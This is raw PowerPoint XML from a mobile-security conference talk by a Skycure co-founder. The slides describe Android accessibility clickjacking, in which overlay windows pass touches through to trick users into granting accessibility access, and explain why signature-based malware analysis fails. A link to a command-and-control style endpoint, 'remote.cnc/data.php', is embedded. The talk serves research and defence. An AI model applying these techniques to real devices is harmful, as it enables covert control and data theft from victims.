            <a:lvl1pPr marL="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr lang="en-GB" sz="900" kern="120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fld id="{BE9C67AB-B614-C742-93A2-1DCA2D6D227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owasp_appsec2016_colosseo_horizontal.pn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-183566" y="3790764"/>
            <a:ext cx="2438494" cy="17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6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021655" y="4826532"/>
            <a:ext cx="1051353" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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698501" y="1066259"/>
            <a:ext cx="8094623" cy="33944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Divider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792985" y="2844392"/>
            <a:ext cx="6327210" cy="129335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2700" b="1" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transition Slide / Sub-section Title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591749" y="62807"/>
            <a:ext cx="457496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000" b="1" i="1" spc="-100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#RSAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" i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 descr="transition slide little piece on the right-01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473" y="0"/>
            <a:ext cx="1157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20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096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17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6F5D2B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sinessinsider.com/password-security-flaw-in-ios-7-lets-siri-control-your-iphone-2013-9" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.forbes.com/sites/kashmirhill/2014/09/15/siri-lets-anyone-bypass-your-iphones-lockscreen-feature-or-bug/#4e4e09e66ed0" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.idownloadblog.com/2015/09/20/ios-9-access-photos-contacts-locked-iphone-security-flaw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zdnet.com/article/vista-speech-command-exposes-remote-exploit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9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reference/android/Manifest.permission.html#SYSTEM_ALERT_WINDOW" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.android.com/reference/android/view/WindowManager.LayoutParams.html#FLAG_NOT_FOCUSABLE" TargetMode="External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hmte160qec0" TargetMode="Externa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remote.cnc/data.php" TargetMode="Externa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remote.cnc/data.php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ycure.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.skycure.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maps.skycure.com/" TargetMode="External"/><Relationship Id="rId6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ontact@skycure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Relationship Id="rId3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45941"/>
            <a:ext cx="9144000" cy="3897559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The Ultimate Reason Why Hackers Are Winning The Mobile Malware Battle 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1014640" y="3053438"/>
            <a:ext cx="3035160" cy="4774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Yair Amit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800" dirty="0"/>
              <a:t>CTO &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Co-Founder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Skycure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2251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45941"/>
            <a:ext cx="9144000" cy="3897559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Circumventing APP SANDBOXING</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(WITHOUT RELYING ON ROOTING)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9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Sandboxing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5638" y="1041400"/>
            <a:ext cx="8669762" cy="3500626"/>
            <a:chOff x="245638" y="1041400"/>
            <a:chExt cx="8669762" cy="35006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638" y="1041400"/>
              <a:ext cx="8669762" cy="325961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5638" y="4280416"/>
              <a:ext cx="20185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+mj-lt"/>
                </a:rPr>
                <a:t>Source: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>developer.apple.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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9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>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Security Implications of Accessibility Features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Accessibility frameworks are traditionally good candidates:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2007 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Windows Vista speech recognition exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>2013 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Siri allows to bypass iPhone lock screen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>2014 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Siri Lets Anyone Bypass Your iPhone's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Lockscreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> -- Feature or Bug?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>iOS 9 allows access to photos and contacts on a passcode locked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>iPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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Android Accessibility Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301752" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>✓ Has full access to content in other apps (e.g. read emails)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301752" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>✓ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Ability to monitor user activity and take actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>accordingly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato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9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Would You Fall For This?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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Accessibility Dialog Approval Proc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2443" y="943091"/>
            <a:ext cx="2339115" cy="415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45941"/>
            <a:ext cx="9144000" cy="3897559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ACCESSIBILITY Clickjacking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a typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>A Few Benign Features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55964"/>
            <a:ext cx="6127668" cy="3340208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/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Draw Over Apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Can be presented on top of other apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SYSTEM_ALERT_WINDOW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Can be used to pass touch events to underlying apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>FLAG_NOT_FOCUSABLE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:ea typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Accessibility APIs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689607" y="1637990"/>
            <a:ext cx="1892453" cy="1976155"/>
            <a:chOff x="6527789" y="1616883"/>
            <a:chExt cx="1892453" cy="19761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3838" y="1616883"/>
              <a:ext cx="1766404" cy="1628404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6527789" y="3339122"/>
              <a:ext cx="159210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+mj-lt"/>
                </a:rPr>
                <a:t>Source: Stack Overflow</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="105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dirty="0" smtClean="0">
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>… Can Be Dangerous Together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04405" y="4377017"/>
            <a:ext cx="18229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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>youtu.be/4cSRq7_Z26s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405" y="1479176"/>
            <a:ext cx="1775531" cy="2897841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-91960" y="848601"/>
            <a:ext cx="7835295" cy="429255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57150" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Victims can be tricked to perform actions without their knowledge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8915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Lollipop?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Original technique was believed to extend till KitKat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lollipop introduced an extra protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tap propagation was not allowed for the “OK” button. A direct tap is required.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That is not enough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C67AB-B614-C742-93A2-1DCA2D6D227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" b="3945"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1674495" y="932497"/>
            <a:ext cx="5795010" cy="327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659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45941"/>
            <a:ext cx="9144000" cy="3897559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 Analysis Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and Why They Fail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Signature-Based Analysis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9833" b="32128"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1063229"/>
            <a:ext cx="9163183" cy="28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 The Speaker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55" y="1360034"/>
            <a:ext cx="1475016" cy="14663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9455" y="2813477"/>
            <a:ext cx="140289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 smtClean="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Yair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Amit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri Light"/>
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>CTO, Co-Founder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="Calibri Light"/>
              <a:cs typeface="Calibri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32376" y="4240648"/>
            <a:ext cx="13970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libri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>20+ Patents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Calibri Light"/>
              <a:cs typeface="Calibri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94" y="3782493"/>
            <a:ext cx="262814" cy="325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906" y="2203289"/>
            <a:ext cx="1365149" cy="329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783" y="1893883"/>
            <a:ext cx="475923" cy="190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392845" y="2567256"/>
            <a:ext cx="74379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/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>IDF 8200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Calibri Light"/>
              <a:cs typeface="Calibri Ligh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749" y="1341759"/>
            <a:ext cx="1830656" cy="46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Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1897777" y="1970550"/>
            <a:ext cx="3561981" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254000" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:tailEnd type="triangle" w="sm" len="sm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Cogs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8316" y="964383"/>
            <a:ext cx="2567356" cy="210399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662726" y="3338538"/>
            <a:ext cx="3371502" cy="128362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Nexus 6Blan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06" y="1200668"/>
            <a:ext cx="2014690" cy="373542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22546" y="1540643"/>
            <a:ext cx="1744670" cy="3097540"/>
            <a:chOff x="700649" y="1026018"/>
            <a:chExt cx="2198318" cy="3902962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="700649" y="1026018"/>
              <a:ext cx="2198318" cy="39029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elay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1165996" y="2682671"/>
              <a:ext cx="1267623" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 8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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="726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2000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="5900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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1"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elay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1170306" y="2865307"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
